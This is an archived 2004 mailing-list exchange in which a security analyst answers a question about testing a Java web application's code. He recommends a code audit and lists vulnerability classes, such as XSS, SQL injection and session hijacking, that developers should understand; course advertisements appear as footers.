RE: Web apps code testing

["Yvan Boily" <yboily () seccuris com>]

There is no single tool that will grant you security.  What you are looking
for is a code audit, which can be performed internally or by another party.

Ideally you would have other people come in to look at the application (i.e.
experts), however if you feel confident in your development teams ability to
secure the application then they can perform the audit themselves.

A good way to check if you need outside security auditors is to ask your
developers if they can explain the following to you:

Cross Site Scripting & SQL injection attacks
Session Hijacking
Race conditions
Access controls and Security models which have been implemented
Role of encryption in the application (above and beyond SSL between the
browser and the web server)

If they cannot confidently offer an explanation of each of them, and
measures that they have taken to prevent them, then I seriously doubt their
capability to ensure that the application is secure.

I would also expect them to have the following given that they are using
Java, and resources related to this are easily identifiable:
Risks of RMI and related technologies in web based applications.
A report of how they dealt with issues such as those outlined in OWASP.
Hardening recommendations for the host environment.

Regards,
Yvan Boily
Information Security Analyst
Seccuris 


 

-----Original Message-----
From: Marty [mailto:groupecci () yahoo ca] 
Sent: Tuesday, March 16, 2004 6:51 PM
To: Sec Basic
Subject: Web apps code testing

Hi,

I have the complete code (Java) for a website our development team just
completed.

Is there a tool I can use to make sure the code is secure?

Thanks!

Marty

__________________________________________________________
Lèche-vitrine ou lèche-écran ?
magasinage.yahoo.ca

---------------------------------------------------------------------------
Ethical Hacking at the InfoSec Institute. Mention this ad and get $545 off
any course! All of our class sizes are guaranteed to be 10 students or less
to facilitate one-on-one interaction with one of our expert instructors. 
Attend a course taught by an expert instructor with years of in-the-field
pen testing experience in our state of the art hacking lab. Master the
skills of an Ethical Hacker to better assess the security of your
organization. 
Visit us at: 
http://www.infosecinstitute.com/courses/ethical_hacking_training.html
----------------------------------------------------------------------------




---------------------------------------------------------------------------
Ethical Hacking at the InfoSec Institute. Mention this ad and get $545 off
any course! All of our class sizes are guaranteed to be 10 students or less
to facilitate one-on-one interaction with one of our expert instructors.
Attend a course taught by an expert instructor with years of in-the-field
pen testing experience in our state of the art hacking lab. Master the skills
of an Ethical Hacker to better assess the security of your organization.
Visit us at:
http://www.infosecinstitute.com/courses/ethical_hacking_training.html
----------------------------------------------------------------------------